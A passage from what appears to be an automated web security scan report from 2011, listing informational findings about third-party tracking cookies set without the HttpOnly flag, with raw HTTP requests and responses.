Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; pv1="b!!!!'!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!#Jl?!$5*F!$uj6!.#:D!%^Pa!!!!$!?5%!$8Ip,!@Dj0!'jh]~~~~~~~='htp=(g[2!!!([!$'!_!$5*F!%1#4!1W4@!%uAQ!!!!$!?5%!*)IX>!?Q8(!(1br~~~~~~~=(1IO=*.n+!!!(["; ih="b!!!!P!'4@g!!!!#=$KA3!)AU6!!!!#='htn!)AU7!!!!#=(1IK!-5BI!!!!$=$J^*!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!/'y^!!!!#=(1IG!/JVV!!!!'='jNd!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1W4@!!!!#=(1IO!1e75!!!!#=%3V6!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2L<B!!!!#=(1ID!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2`+,!!!!#='hw!!2gH2!!!!#='i#o"; bh="b!!!%!!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!+=(5yj!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!#=(C+#!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!,=(6NF!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7!!!!!#=(:!J!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!#=(C1>!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#s`D!!!!#=(BU+!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#slj!!!!#=#T_f!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#wUS!!!!,=(6V[!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$/F4!!!!#=(1C-!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:29 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%!!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!+=(5yj!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!#=(C+#!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!,=(6NF!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7!!!!!#=(:!J!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!%=(C6j!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#s`D!!!!#=(BU+!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#slj!!!!#=#T_f!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#wUS!!!!,=(6V[!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$/F4!!!!#=(1C-!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; path=/; expires=Sun, 16-Jun-2013 11:58:29 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Fri, 17 Jun 2011 11:58:29 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

10.15. http://as00.estara.com/fs/ruleaction.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as00.estara.com
Path:	/fs/ruleaction.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

fscookies=b64_Xc3BDoMwCIDht-G2BWih9NBnWbqtiTvYGa3v70FXybj9.QIQAIKQinec0IE6JEI-5GcrayOjjyXXd92mFOIdHIPG30gYGDHE2-hpa8IzvnOpR6gV7eKZqcsR1w7bHbYiVuTvz5TbayzXwd47; expires=Wed, 15-Jun-2016 12:03:40 GMT; path=/; domain=.estara.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.16. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Sun, 16-Jun-2013 11:59:07 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.17. http://cf.addthis.com/red/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cf.addthis.com
Path:	/red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308311946.1FE|1308311946.60|1308311946.1EY|1308225884.19F|1308225884.1VV|1306359996.1OD; Domain=.addthis.com; Expires=Sun, 16-Jun-2013 11:59:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.18. http://citi.bridgetrack.com/usc/_bt_appredir.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/usc/_bt_appredir.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TPMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308312896020; expires=Fri, 17-Jun-2011 17:15:56 GMT; path=/
CitiBT%5F9=VTIEML=0&VTI3PTY=&VTIPUB=705&VTITRF=43153&VTIPRC=0&VTICAT=0&VTISEG=0&VTIWAV=0&TX=1308312778&VTICON=0&VTIPRD=0&VTICHN=0&VTIVAR=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&VTIAS=0&VTILNK=0&SID=C626E9F2656E4606A21348462D13F6BA&VTIVEN=1805; expires=Sun, 17-Jul-2011 04:00:00 GMT; path=/
CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /usc/_bt_appredir.asp?app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&link=Consumer%5F631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734&TID=17781 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer%5F631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVMC0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6=T=1308307229238; TVMC0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6=T=1308307241722; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6=T=1308312772545; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6=T=1308312773218; CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; CitiBT%5F9=VTIVEN=1805&SID=C626E9F2656E4606A21348462D13F6BA&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&TX=1308312778&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTITRF=43153&VTIPUB=705&VTI3PTY=&VTIEML=0; CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; ATC9=47125d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0cccccccccd199P7Qcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hccccccccc; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308312778116

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 16 Jun 2011 12:14:56 GMT
Location: https://online.citibank.com/US/JRS/portal/prefillApps.do?app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734
Server: Microsoft-IIS/7.0
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: TPMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308312896020; expires=Fri, 17-Jun-2011 17:15:56 GMT; path=/
Set-Cookie: CitiBT%5F9=VTIEML=0&VTI3PTY=&VTIPUB=705&VTITRF=43153&VTIPRC=0&VTICAT=0&VTISEG=0&VTIWAV=0&TX=1308312778&VTICON=0&VTIPRD=0&VTICHN=0&VTIVAR=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&VTIAS=0&VTILNK=0&SID=C626E9F2656E4606A21348462D13F6BA&VTIVEN=1805; expires=Sun, 17-Jul-2011 04:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; path=/
Date: Fri, 17 Jun 2011 12:14:55 GMT
Connection: close

10.19. http://citi.bridgetrack.com/usc/_spredir.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/usc/_spredir.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
CitiBT%5F9=VTI3PTY=&VTIEML=0&VTITRF=43153&VTIPUB=705&TX=1308312846&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&VTIVEN=1805&SID=E757957DB08144938AD7A32A94698E09; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; path=/
ATC9=6235d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0cccccccccd199P7Qcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199P9Ucc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hccccccccc; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308312846129; expires=Fri, 17-Jun-2011 17:15:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144656&pg=11&pgpos=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVMC0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6=T=1308307229238; TVMC0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6=T=1308307241722; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308307241791; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6=T=1308312772545; ATC9=49814d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0ccccccccc; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6=T=1308312773218; CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; 